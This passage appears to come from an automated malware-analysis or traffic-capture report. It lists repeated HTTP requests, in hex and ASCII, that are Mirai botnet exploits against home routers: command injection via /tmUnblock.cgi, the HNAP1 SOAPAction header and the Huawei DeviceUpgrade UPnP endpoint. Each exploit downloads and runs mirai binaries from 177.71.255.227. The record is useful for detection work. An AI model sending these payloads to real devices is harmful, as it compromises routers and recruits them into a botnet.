3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 